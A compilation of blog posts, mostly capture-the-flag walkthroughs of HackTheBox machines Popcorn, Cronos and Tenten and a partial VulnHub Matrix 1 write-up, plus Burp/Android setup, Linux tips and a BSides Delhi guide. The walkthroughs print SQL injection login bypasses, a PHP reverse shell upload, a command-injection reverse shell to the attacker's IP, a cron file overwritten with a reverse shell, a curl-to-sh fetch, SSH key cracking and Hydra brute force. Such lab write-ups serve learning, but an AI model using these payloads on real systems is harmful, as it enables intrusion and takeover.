Popcorn HackTheBox

Hack The Box
Machine Profile
2.19.0
image

Popcorn


Description
OS: Linux
Difficulty: Medium
Points: 30
Release: 15 Mar 2017
IP: 10.10.10.6
Walkthrough

Nmap Scan to enumerate services

$ sudo nmap -sC -Pn -sV -A -O 10.10.10.6 -o nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 13:52 EDT
Nmap scan report for 10.10.10.6
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/4%OT=22%CT=1%CU=35952%PV=Y%DS=2%DC=T%G=Y%TM=5EB056A7
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=CA%GCD=2%ISR=CA%TI=Z%CI=Z%II=I%TS=8)SEQ(SP
OS:=C9%GCD=1%ISR=C9%TI=Z%CI=Z%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54
OS:DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=16A0%W2=16A0%
OS:W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW6%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=1
OS:6A0%S=O%A=S+%F=AS%O=M54DST11NW6%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R
OS:=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   273.37 ms 10.10.14.1
2   273.85 ms 10.10.10.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.94 seconds

Lets search for OpenSSH 5.1p1 Debian 6ubuntu2 exploit in kali searchsploit

$ searchsploit openssh

No exploit available for OpenSSH 5.1p1 Debian 6ubuntu2

without wasting time, lets check what port 80 has for us.

Open your favourite browser and type 10.10.10.6

Found nothing interesting, then lets use our Dirb

$ dirb http://10.10.10.6

Well, http://10.10.10.6/torrents seems interesting.

Navigate to http://10.10.10.6/torrents

From above Torrent Hoster, my attack surfaces are:

  • Upload field
  • Login
  • Register

I would test for sql injection, because I don’t want to register.

  • Click on Login,
  • Enter username = abc' or 'a'='a'-- a and password anything like pasword = iamnothing.
  • Click Login and see if it works. Yess it absolutely works, now don’t ask how because its not a SQL injection class.

Moving forward, click on My Torrents and see what is there

Click on Kali Linux under filename

Well, it seems we can upload screenshots by clicking on Edit this torrent. The application is built in PHP so we can upload php shell or can create our own exploit to get reverse shell. I prefer to use pentestmonkey.net shells.

You can directly download php shell by clicking on shell

You can also visit pentestmonkey to read how to use it or follow below walkthrough copied from pentestmonkey.net. I hope it does not bother @pentestmonkey .

Modify the source

Edit the following lines of php-reverse-shell.php:

$ip = '10.10.14.18';  // Remember enter `tun0` interface IP here 
$port = 8002;       // CHANGE THIS

In order to catch shell

Start a TCP listener on a host machine and port that will be accessible by the web server. Use the same port here as you specified in the script (8002 in this example):

$ nc -v -n -l -p 8002

Upload and Run the script

Note We will use Burp Suite as an interception proxy tool to bypass any file upload restrictions

  • Click on Edit this torrent.
  • Rename your php shell to exploit.php.jpg.
  • Use below command to do same
    $ mv php-reverse-shell.php exploit.php.jpg

  • Turn Burp Suite intercept on and in your browser, click browse to upload your php shell
  • Click submit and make changes in Burp Suite’s captured HTTP request as shown below

  • Click forward in Burp Suite and wait for the browser to show the below message

Now wondering what next, then go back and notice the results in dirb scan, we found one upload endpoint http://10.10.10.6/torrent/upload/. Check it out if it contains our uploaded file.

Navigate to http://10.10.10.6/torrent/upload/. Yessss, it contains our uploaded file

I know, you might be eager to click on it, but first make sure your netcat listener is running and listening on port 8002

Click on the uploaded php file and see if we get a shell

Yess, we have got a shell and it looks like this

Its not interactive shell, so lets make it interactive(ITS OPTIONAL)

rUN

$ python -c 'import pty; pty.spawn("/bin/bash")'

$ ls -la

$ cd /home && ls

$ cd george

$ ls

And we have our user.txt here.

$ cat user.txt

and submit your flag as fast as possible, because we are yet to pwn the root and time is limited because time is money

USER OWNED

$ cd /root

Changing directory to root says permission denied, which means we need to escalate privileges.

I won’t write all jargon which I went through while pwning the root so jumping directly to how.

Linux kernel used is Linux version 2.6.31-14-generic-pae. You can check kernel with below command

$ cat /proc/version

Navigate to https://www.exploit-db.com/exploits/15704 and download the exploit. It matches our version of kernel

After downloading rename it in case you don’t like the original exploit name. I didn’t like so renamed it to exp2.c.

Now we need to transfer our payload into the pwned popcorn machine.

Run python -m SimpleHTTPServer 8003 in the directory where you downloaded the exploit.

Inside popcorn machine, run $ cd /tmp. Remember we need to enumerate which directories our user has write permission, in this case /tmp has. So we will download the exploit here.

$ wget 10.10.14.18:8003/exp2.c

We need to compile the program before running it.

$ gcc exp2.c -o exp3

Now run

$ ./exp3

Navigate to cd /root and read the root.txt

Hence !!! :) :) ROOT pwned.

ROOT PWND

Note We have exploited the kernel to get root. But the official way is something else. When I was trying to pwn the root using the other way, I faced serious problem which I could not figure out how to solve. May be there is some change in the machine it self. You may refer to ippsec popcorn walk through in case you are eager to learn the other way too.

If you solve the machine using the ippsec way after this date, I would be happy to know how. You can reach out to me @r00trwx

Configuring Android Studio Emulator to work with BurpSuite

Configuring Android Studio emulator to Work With Burp Suite

This is a short blog where you will learn about how you intercept HTTP or HTTPS traffic Android Studio AVD to BurpSuite. The reason for writing this blog is because I I myself spent hours to figure out how to intercept traffic in BurpSuite from android studio AVD.

I assume that android studio and BurpSuite are properly installed inside your system and are working properly. Lets start by configuring BurpSuite to intercept traffic from Android Studio ADV

Steps:

  1. Open BurpSuite
  2. Go to Options under Proxy tab
  3. Click Add in order to add new Proxy Listeners
  4. Now enter your desired port which is available, in my case I am using 8085.
  5. Choose radio button having option All interfaces and click OK
  6. Make sure that under Proxy Listeners, *.8085 interface is checked
  7. BurpSuite is configured

Lets configure Android Studio

  1. Open android studio and create an emulator using AVD manager available under Tools in android studio.
  2. In my case I am creating Pixel 27 Android 8.1.
  3. Choose Release name based on your requirement.
  4. Incase you get this error /dev/kvm device: permission denied, then you need to give root permission to /dev/kvm
  5. Use command sudo chmod 777 -R /dev/kvm to assign permissions
  6. Make sure you don’t forget to give AVD Name, I have named it as target_machine.

  7. Check you system network interface wlan IP using ifconfig. In my case it is 192.168.0.108
  8. Navigate to directory where you installed Android Studio and its components if any
  9. By default it is in users home directory, use below command to go there
  10. cd ~/Android/Sdk/emulator
  11. Now once you are in the emulator directory, run command ./emulator -http-proxy http://192.168.0.108:8085 -avd target_machine
  12. Follow steps as mentioned in below image
  13. Configure the manual proxy configuration

Lets see whether Burp intercept traffic from android studio AVD or not.

Open BurpSuite and turn on intercept. Access any site in phone browser. As shown in below image we are successfully able to capture traffic in BurpSuite

But when we forward the request in BurpSuite, browser shows the connection is not secure because it requires Burp CA certificate.

Cronos HackTheBox

Hack The Box
Machine Profile
2.19.0
image

Cronos


Cronos - Description
OS: Linux
Difficulty: Medium
Points: 30
Release: 22 Mar 2017
IP: 10.10.10.13
Walkthrough

Back with another retired machine on HackTheBox, this time we have Cronos, which if you break then it becomes Cron + OS.

From the name, I assume this machine must have something to do with Cron jobs, but it is an assumption.

Enumeration

As usual, we start with Nmap enumeration

nmap -sC -sV -A 10.10.10.13

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 20:20 EDT
Nmap scan report for cronos.htb (10.10.10.13)
Host is up (0.38s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Cronos
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.64 seconds

Services enumerated

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

22/tcp SSH can help us with username enumeration

53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)

53/tcp Domain BIND v9 has known vulnerabilities

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Apache server running at port 80

Starting with port 80,

  1. Navigate to http://10.10.10.13:80
  2. Apache2 Ubuntu default page loads

  1. Apart from Apache default page nothing else is found.
  2. Its time to use our arsenals, that is dirb,disbuster to enumerate directories.
  3. Used Dirbuster and found nothing.
  4. This is what we call hitting a wall

It seems, IP 10.10.10.13 might have a virtual hostname, lets try to find it via

nslookup 10.10.10.13 10.10.10.13

In above command, we first set our nslookup server value 10.10.10.13 and then pass the IP we want to lookup

From result, it looks the IP resolves to ns1.cronos.htb. We get our domain name cronos.htb

For cronos.htb to work, we need to resolve IP 10.10.10.13 to cronos.htb in our /etc/hosts file.

To do so,

sudo nano /etc/hosts

and add below line

10.10.10.13 cronos.htb

Now when we browse to cronos.htb page, it will be resolved to 10.10.10.13 and will serve the page based on the virtual host configuration

When we browse to cronos.htb, we get this page

It did not contain anything else than the white page as shown above, which means we again hit a wall.

After looking at the Nmap scan again and again, the second service 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) kept bugging me. Port 53 why this service is used so I googled it.

Checking over google, gives following answer to question what port 53 used for

The DNS uses TCP Port 53 for zone transfer, for maintaining coherence between the DNS database and the server. The UDP protocol is used when a client sends a query to the DNS server. The TCP protocol should not be used for queries as it gives a lot of information, which is useful to attackers

Also not to forget, if you navigate to https://ns1.com/resources/bind-dns-pros-cons-and-alternatives

You will read that, BIND provides tools that help manage a DNS system, including:

  • dig - allows users to run DNS queries and view server output.
  • host - converts hostnames to IP addresses.
  • nslookup - queries DNS servers for information about hosts and domains.
  • Remote Name Daemon Control (rndc) - allows administrators to control all operations of the name server via an encrypted channel

Lets initiate a zone transfer and see what we get

dig axfr @10.10.10.13 cronos.htb

Well well well, it looks like we hit a right wall this time,

I know, you must be in hurry to browse to admin.cronos.htb but wait, first add the subdomain in /etc/hosts

10.10.10.13 admin.cronos.htb

Now lets browse to admin.cronos.htb

Awesome, we have a login form, without wasting any time, lets test the login page for boolean based SQL injection

Enter value of UserName : admin' or 'a'='a'-- a and password anything. Click submit

Yes, it is vulnerable to SQL injection and we are logged in

The form contains two services traceroute and Ping. Both are OS commands so we can get our reverse shell easily if user input is not properly santized.

Start a listener in your terminal

nc -nlvp 6001

Change the service from traceroute to Ping and enter value as

127.0.0.1; php -r '$sock=fsockopen("10.10.14.25",6001);exec("/bin/sh -i <&3 >&3 2>&3");'

Click Execute

Hence we got our shell

The current user is www-data

USER OWNED

Lets find our first flag to complete the ritual

cd /home && ls

User directory is noulis

cd noulis && ls

& in order to read flag

cat user.txt

Navigating to /root is denied, so we need to escalate privileges.

Try running sudo -l. It gives nothing.

When I dont find any service using sudo -l, then next thing I do is use linpeas to enumerate everything possible on the box

If you are new to linpeas, follow below steps to use it.

On your base machine(In my case it is kali Linux), run below commands

git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git 

Now navigate to privilege-escalation-awesome-scripts-suite

cd privilege-escalation-awesome-scripts-suite  && cd linPEAS 

Now run python server to serve the linpeas file to the cronos machine or to machine whose reverse shell you just got

python -m SimpleHTTPServer 6002 

Now in the cronos machine/Shell , Run

Note: Run below command in the reverse shell you just got

curl 10.10.14.25:6002/linpeas.sh | sh   

Note : IP 10.10.14.25 is my tun0 IP

The scan results a lot of juicy information, but we are interested in something which can get us root

If you remember, In starting I mentioned the machine name to be Cron+OS and it might have something to do with cron jobs. I think I was right.

The result of linpeas contains

You can also read the crontab by

cat /etc/crontab  

If you are new to cron jobs and want to learn about it then follow this blog. It explain cron jobs very well

Link: Cron Jobs with php

Also if you are new to Laravel and wondering what is artisan then follow this documentation

Link: Laravel Artisan

In short, Artisan is the command-line interface included with Laravel. It provides a number of helpful commands that can assist you while you build your application

The artisan file is run by root as shown in above image, if user www-data has write permission to artisan file, then we can get root. Lets check it by navigating to the location

cd /var/www/laravel && ls -la

Yess, the user has write permissions

Lets edit the file by running the below command

echo '<?php $sock=fsockopen("10.10.14.25",6005);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' > /var/www/laravel/artisan

The above command will change the commands written inside the artisan file

Now run a netcat listener to check if we get root

nc -nlvp 6005

Wait for the cronjob to do its work and give us a shell

Hence the R00t is pwned

ROOT PWND

To complete the ritual, lets find our root.txt

ls

then

cat root.txt

Happy Pwning!!!!!

Tenten HackTheBox

Hack The Box
Machine Profile
2.19.0
image

Tenten


Tenten - Description
OS: Linux
Difficulty: Medium
Points: 30
Release: 22 Mar 2017
IP: 10.10.10.10
Walkthrough

Enumeration

As usual starting with Nmap scan to enumerate services running on the target

nmap -sC -sV -o tenten 10.10.10.10

nmap -sC -sV -o tenten 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 15:03 EDT
Nmap scan report for 10.10.10.10
Host is up (0.34s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal &#8211; Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.23 seconds

We have two ports open and services running are

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Its time I use my pentesting skills, so let open web service running at port 80

It is a wordpress website.

Before using my powers like dirbuster/gobuster or wpscan to dig deep into this wordpress application. Lets do User driven workflow to understand what this application exactly does

In wordpress, most of the times the posts on the application contain the author name. This is because from what I know wordpress started with idea of blogging and blogs do have author name. So my first step would be to check any any posts available.

Well on the homepage only we have our default Hello World post.

Lets read what the Hello World posts talks about. We do this by clicking on the posts title or you can make request to http://10.10.10.10/index.php/2017/04/12/hello-world/

I got what I wanted, wondering what

A user on the application named Takis

other way in wordpress to figure out users on the application is to make request to URL http://10.10.10.10/index.php/wp-json/wp/v2/users

If you want to enumerate more!! Please do, but I am happy with takis.

It is always a good practice to check the offical theme/framework used from official website. And as I follow good practices, so I will check the original theme. Check below picture for the same

If you notice, it has three menus which I have highlighted. In our tenten web app, it also has one menu named JobsListing.

What are you waiting now, click on that menu and check what it has for us.

Ohh it has a job listed for Pen Tester. Thanks to tenten, I was also looking for a job. I’ll apply here.

Click Apply Now

It has a URL which is Id driven http://10.10.10.10/index.php/jobs/apply/8/, a form with so many user controlled input fields and our favorite upload field.

Attack surfaces

  • http://10.10.10.10/index.php/jobs/apply/8/, you can think it as http://10.10.10.10/index.php/jobs/apply=8 If you do web assessments, the Id driven pages should always strike your eyes. My next thought would be to change the Id from 8 to some other value and check what happens

I changed my Id value to 13 and look what I got

http://10.10.10.10/index.php/jobs/apply/13/

  • Form with input fields
  • Resume upload feature, I know you are feeling happy looking at this feature and you have this feeling that now the machine is pwnd. But let me tell you, this upload feature won’t help you that much to pwn the machine.

Coming to our first attack surface

Open Burp Suite, and intercept the request

Make a request to URL http://10.10.10.10/index.php/jobs/apply/8/

Send the request to intruder and follow below pictures

Under Option tab --> Grep - Extract

In step 3, select <title>Job Application: Hello world! &#8211; Job Portal</title> and click ok as shown in above image

And notice the intruder results

The result contains mixture of both posts names and various file names which candidates uploaded while uploading resume.

The Title: HackerAccessGranted looks promising

Note Wordpress directory structure for populating a file uses below structure

Array
(
    [path] => C:\development\xampp\htdocs\example.com/wp-content/uploads/2012/04
    [url] => http://example.com/wp-content/uploads/2012/04
    [subdir] => /2012/04
    [basedir] => C:\~\example.com/wp-content/uploads
    [baseurl] => http://example.com/wp-content/uploads
    [error] => 
)

The example above is based on windows and forgive me if you are not a windows fan

The idea behind the example is to look at the [url] and [subdir] to understand how wordpress stores the files.

Lets try to access HackerAccessGranted and check what this is exactly. Following above URL structure

Navigate to http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg and you will find below response in browser

If you are wondering, how I figured out the dates, then it was a guess because its a job application and dates were mentioned in the job post

The image says ACCESS GRANTED means it has something good waiting for us.

Lets try to extract any information possible from the image. I use steghide for this work

Save the image and run this command where you saved the image

steghide extract -sf HackerAccessGranted.jpg

It will ask for passphrase, just press enter

You will find id_rsa ssh private key being extracted from the image

So lets try to ssh using the private key

ssh -i id_rsa takis@10.10.10.10

Well it asks for passphrase, and obviously we don’t have that. So next thing which comes into my mind is to use JohntheRipper to brute force the passphrase.

We will need a script, ssh2john.py. It comes along with Kali Linux

To find the file, run below commands

updatedb
locate ssh2john.py
cp $(locate ssh2john.py)

Now, we will create a hash using it

python ssh2john.py id_rsa > id_rsa.hash

Now, let’s find and copy rockyou.txt.gz, our wordlist

cp $(locate rockyou.txt) .

Now, unzip the file

gunzip rockyou.txt.gz

Its time to use john and rockyou.txt and crack the SSH key

john id_rsa.hash -wordlist=rockyou.txt

Run cp id_rsa ~/.ssh

cd ~ && cd .ssh

chmod 400 id_rsa

and now ssh -i id_rsa takis@10.10.10.10 and use passphrase superpassword which we cracked by brute forcing the id_rsa

Hence User owned

USER OWNED

do ls -la and check your flag file user.txt

cd /root

Next thing I usually do for privilege escalation is to check services I can run as root being the current logged in user. To check this type

sudo -l

So I can run /bin/fuckin as root without any password

Note A brief search about what /bin directory do in linux

The /bin Directory
/bin is a standard subdirectory of the root directory in Unix-like operating systems that contains the executable (i.e., ready to run) programs that must be available in order to attain minimal functionality for the purposes of booting (i.e., starting) and repairing a system

Follow URL https://refspecs.linuxfoundation.org/FHS_3.0/fhs/ch03s04.html to check what commands can you run if you have /bin access

The list in above URL says that we can run sh

sh POSIX compatible command shell

So we run sudo /bin/fuckin sh

And we become root. You can check this by using command id as shown in above picture. Hence the machine is pwnd.

ROOT PWND

In order to complete the ritual, find the root.txt and submit the flag

Now run cd /root && ls

Linux Things : UBER-COOL things I Learned this Year(2k19)

Linux things You must know

Some Cool Linux Uber-cool things I learned this year


i3wm

Starting with i3wm, I know its not a new thing out there in the open source market but still I see many people suffering in managing their task management thing. So here we start with i3 Window Manager.

Platform Availability:

Available for various Linux sweet flavors.


Stable Version: [Click here]
Download Link : [Click here]


or install using Cli.

sudo apt install i3

Setting up i3wm

As of now, I won’t be mentioning the steps which I used in setting up my i3wm but will share resources which are really good to start with and believe me they are really good even I started with these resources only. I will also be sharing complete layman written documentation of my own on setting up i3wm.

Resource 1 (Code Cast): Watch here

Notes:
1. Watch carefully each step and would recommend having patience and trying the steps shown in the tutorial again and again in case you find yourself stuck somewhere.
2. Don’t try to copy and paste someone else i3 dotfiles as it might mess your entire Linux environment because there may be different dependencies or tools installed while writing those dotfiles.

Resource 2(i3wm docs): Read here

Resource 3(Docs Links): Read here
Read here

Running your application Inside Linux Containers

We all use application, tools or say softwares in our linux OS but what if we somehow run everything inside linux containers which will provide isolation, save memory and a lot of other things.

If you don’t get it then say running each application virtually or say in virtual machines. The only difference will be that it will be linux container technology instead of virtual machines. If you want to learn the difference between container technology and Virtual machines, I recommend reading my gitbook page where I have explained with pictorial example.

Click me

Okay I hope you read it and understand what we are dealing with now.

Motivation: Jessie Frazelle - Dockercon SF 2015

well thats true I got motivated to use everything inside containers just after I saw Jessie Frazelle giving her talk Container Hacks and Fun Images.

How To:

Wireshark in Container

Steps:

First of all we need to write dockerfunctions which on called will run container. Either you can write your own or you may use Jessie Frazzle github repo where she has created various functions under .dockerfunc file for different software and services.

Clone the repo Clone and then move .dockerfunc to home directory
Change diretory to cloned directory which in this case will be dotfiles

mv .dockerfunc /home/${USER}

It will move .dockerfunc to logged user home directory.

Now open Bashrc file i.e, .bashrc

cd ~
nano .bashrc

and paste the following code at the end of .bashrc file before unset file.

for file in ~/.{dockerfunc}; do
if [[ -r "$file" ]] && [[ -f "$file" ]]; then
	source "$file"
fi
done

Now try to run the container for example wireshark or any other software or service defined in .dockerfunc file. NOTE that sometimes it gives error for incorrect username and Password in that case just login again to docker into your CLI

docker login

Note: First when you run any service, it will first download the container image locally so that it can store it into local image repository for lator use.

Everytime you run a new service, it will fetch images from jess Docker repo. You may also download all the dockerFiles written by Jessie Frazzle and can build images again and push to your own DockerHub repo to make it do a pull from your repo.

But I would recommend contributing to Jessie Frazzle repo.

Download DockerFiles from Here

You are all set, now just run application or service available or say written inside .dockerfunc. Also contribute to Jessie Frazzle repo to add more docker function of tools and services which should be run in container and are missing from the .dockerfunc file.

Linux Commands

Use of Aliases to make things short and to save more time.

Example:

alias h="history"
alias update="sudo apt update"

Now what you can do is to write all the shortform name or say aliases of commands which you want to and save it inside .bashrc file.

You might also give a look at Jessie Frazzle aliases file for better examples and use.

Alias dotfile

create a file in your user home directory named .aliases

cd ~
nano .aliases

and paste all the content from this github file

Now open .bashrc file and at the end add aliases in the for loop we created while playing with linux containers.

for file in ~/.{dockerfunc,aliases}; do
if [[ -r "$file" ]] && [[ -f "$file" ]]; then
	source "$file"
fi
done

You are all done to use aliases for commands which you feel take your time.

zsh

It is a open source project or say framework to add themes to your terminal or increase it capabilities

Some cool themes of this framework are:

Ohmyz.sh

In order to install it, you may follow these below mentioned resources.

Resources 1: Install Ohmyzsh

Resource 2: Installation Guide

Note

It does not end here, I have so many other things on my plate which I will keep adding lator on


BSides Delhi - The Survival Guide

BSides Delhi 2k19 | SecurityBsides | BSidesDelhi Conference

About BSides Delhi

The cyber security industry is now bigger and more active than ever before. So, a lot of activities and conferences being held every year. Now, here i am introducing you all with one of the major conference BSides Delhi. Security BSides is a community driven framework for building events by and for information security community members. These events are already happening in major cities all over the world! They are responsible for organizing an independent BSides approved event for Delhi, India.

It is a volunteer organized event (it has no paid staff), and truly strive to keep information accessible for everyone.

I am Volunteering | YEAHHH!!!

So, I am Priyam Singh and I am volunteering this year in BSides Delhi 2k19. I really thank BSides Delhi #team for giving me such an incredible opportunity. I am really glad and excited to attend the conference on 11th October,2019. The event venue is Vivanta New Delhi, Dwarka.

Insights About Conference

The event is going to start with Keynote Talk by Leigh-Anne Galloway(Security Researcher) and Adam Laurie (Global Associate Partner and Lead Hardware Hacker, IBM X-Force Red) then technical talks, workshops, village speakers, panel discussion and in last the sub-events.

As it is the first conference I am attending, I desire that it turns out to be overwhelming for being around to some of the best security researchers from India and outside, being able to meet them and have their valuable advice. Nothing short of a goldmine to say, for many of whom who are getting started with and are trying to make a career in Security. If you are eager to know about these best security researcher follow below link.

Speakers

From last two years I have heard a lot from my friends who already have been part of this conference, about what all activities held and organised and what all things one can learn with such conferences.

Now few things I would like to mention if its your first time so that you dont miss anything and get the most out of the conference.

Important Key Notes
* Don't miss your pass of conference.
* Coming early and grabing your SWAG and IDs and become familier with the environment.
* Prepare a pre-list of all talks and workshops a day before the conference which you are interested to attend.
* During talks make note on important points
* Ask questions from the speaker at the end of the talk or during the Q&A session and try to have an interactive session.
* Try to interact with other attendees also.
* Ask volunteer's if you need any help, they are right person to guide you.
* Apart from the talks, they might have organised a special party in the evening, surely attend it if you are invited.
* Party is another important thing not to miss in the conference.
* Interact with people and introduce yourself, also try to increase your network and share social profiles which might be useful for you further.

Apart from this you might glimse the beauty of Delhi.

  • You can visit nearby historical sites at one go so you can visit something of your choice. Places like:

Red Fort # Jama Masjid # Tuglaqabad Fort # Qutub Minar # Meharauli Archeological Park # Humayun’s Tomb # Hauz Khas Fort # Lodhi Garden # Lotus Temple and Jantar Mantar

  • If you really want to pick one, try going to Humayun’s tomb or visit Qutub Complex.
  • Also go to Rashtrapati Bhavan, Lutyens Delhi and India Gate.
  • Also Delhi is the Food Capital of India, so go and taste varios different delicious dishes.

  • Despite being the hub of world class shopping malls, the true Delhi lies in its bazaars. Lajpat Nagar, Sarojini Nagar, Kamala Nagar Market, Janpath and Karol Baghare some of the most happening shopping destinations.

This is all from me, do not forget to meet me in conference. I will be part of Volunteering Team this time. Find me at @DevOpsgirl_ or Linkedin

Hope, this event goes a great success and everyone coming learn and experience many new things which will be of immense importance.

Matrix 1

Description

Matrix is a intermediate level boot2root challenge. The OVA is tested on both VMware and Virtual Box.


Flags: Goal is to get root and read `/root/flag.txt`
Networking : DHCP: Enabled IP Address: automatically assigned

Download link: [Link 1] || [Torrent]
Download Size : 552 MB
For more details: Visit [Vulnhub.com](https://www.vulnhub.com/entry/matrix-1,259/)

Walkthrough

First we nedd to do IP discovery of our target machine. So that we can get the IP to interact with the machine. Because we don’t have login credentials for logging inside the matrix machine.

For IP discovery : If you have Blue Team Field Manual(BTFM). Then open it and under scanning and Vulnerbility you will find below commands

You may discover using netdiscover or nmap.

Open your terminal

$ netdiscover

or

$ nmap -sn -PE 192.168.1.0/24    

nmap image

if you want to be more specific then you may use below command

$ nmap -sn -PE 192.168.1.0/24 | grep scan | cut -d " " -f 5

Here

-sn: Ping Scan -Disable port scan
-PE: ICMP Echo request
Do man for grep and cut
Example : $ man grep

Now we have the IP
Next if you see in BTFM book, you will see Scan and show open ports, determine open services,scan TCP and UDP ports. Lets use it all together to be more verbose and save it to a file matrix_nmap.txt

$ nmap  -T3 -A -v -oN matrix_nmap.txt 192.168.1.38

If you see the output then, we have 3 open ports

port 22 SSH
port 80 http
port 31337 http

we have 2 http ports, so lets explore them in our browser

Starting with port 80

After opening it in browser, you will get a page saying “Follow the white rabbit

And ya there is a rabbit at end of page I have highlighted it. so I know what you are thinking, yes we will do inspect element over it and we get this.

We have port 31337 as hint.

Lets open it in browser that is http://192.168.1.38:31337

Again this page tell something about Cyber, but if you read the quato carefully, then it says at the end Ignorance is bliss. be carefull, don’t start decoding it and get trapped into rabbit hole.

Act normal and check the page source.

you already have figured it out that it is base64 encoded. Don’t think much go and decode it by using whatever tool, website you want.

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

For most decoding or encoding part I use string-functions

we get the decoded string as

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

I hope you understand that some text is echoed and saved in Cypher.matrix But wait what it has to do with this machine. Because we have not yet found any field where we can pass input.

Why not to try this file in url.

    http://192.168.1.38:31337/Cypher.matrix

Once you type this in url. It will ask you to save a file name Cyber.matrix

Save the file and open it into your terminal with your favorite editor.

You will see some really weird thing but after spending some time on google, you will find that this is Brainfuck programming Language. So lets decode it using online decoder If not able to decode, try changing the browsers. Once decoded, you will find below text.

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password

After reading above decoded text. We have

Username of machine: Guest Password : k1ll0rXX

Here, as he forgot the last 2 character, so what we can do is generate wordlist with k1ll0rXX

You may use any tool to generate wordlist like Crunch or mp64

Here we will be using mp64 which is basically maskprocessor(mp)

$ mp64 -o matrix_wordlist.txt k1ll0r?a?a

Note: If you are using any shell like zsh, you might face problem generating wordlist. So switch to your default shell .

Now we have list and need to bruteforce it against matrix machine. So we will use Hydra and will try to login via SSH as a guest.

$ hydra -l guest -P matrix_wordlist.txt ssh://192.168.1.38

So login using SSH command, and use password k1ll0r7n

$ ssh guest@192.168.1.38
USER OWNED

Fially we are in, but wait I am not able to execute any command. Which means its a restricted shell. This shell is used for security reasons say to restrict users from certain commands.

